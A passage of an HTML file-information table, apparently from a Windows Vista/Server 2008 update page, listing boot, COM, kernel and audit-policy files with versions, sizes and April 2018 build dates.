applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe</td><td>6.0.6002.24362</td><td>1,016,512</td><td>10-Apr-2018</td><td>19:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winresume.exe</td><td>6.0.6002.24259</td><td>931,560</td><td>15-Dec-2017</td><td>14:05</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,240</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,240</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,240</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,752</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>8,192</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll</td><td>6.0.6002.24259</td><td>650,984</td><td>15-Dec-2017</td><td>14:05</td><td>x86</td><td>Not applicable</td></tr><tr><td>Driver.stl</td><td>Not applicable</td><td>4,349</td><td>15-Dec-2017</td><td>14:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>1,321,472</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Rpcss.dll</td><td>6.0.6002.24367</td><td>554,496</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>4,096</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>02:36</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>7,168</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>01:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Csrsrv.dll</td><td>6.0.6002.24367</td><td>49,664</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>896,000</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>229,376</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>159,744</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>245,760</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>286,720</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>196,608</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>233,472</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>155,648</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>02:39</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>237,568</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>290,816</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>221,184</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>147,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>180,224</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>118,784</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>151,552</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,592</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>163,840</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>253,952</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>188,416</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>131,072</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>40,960</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>135,168</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>45,056</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:40</td><td>x86</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>01:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not 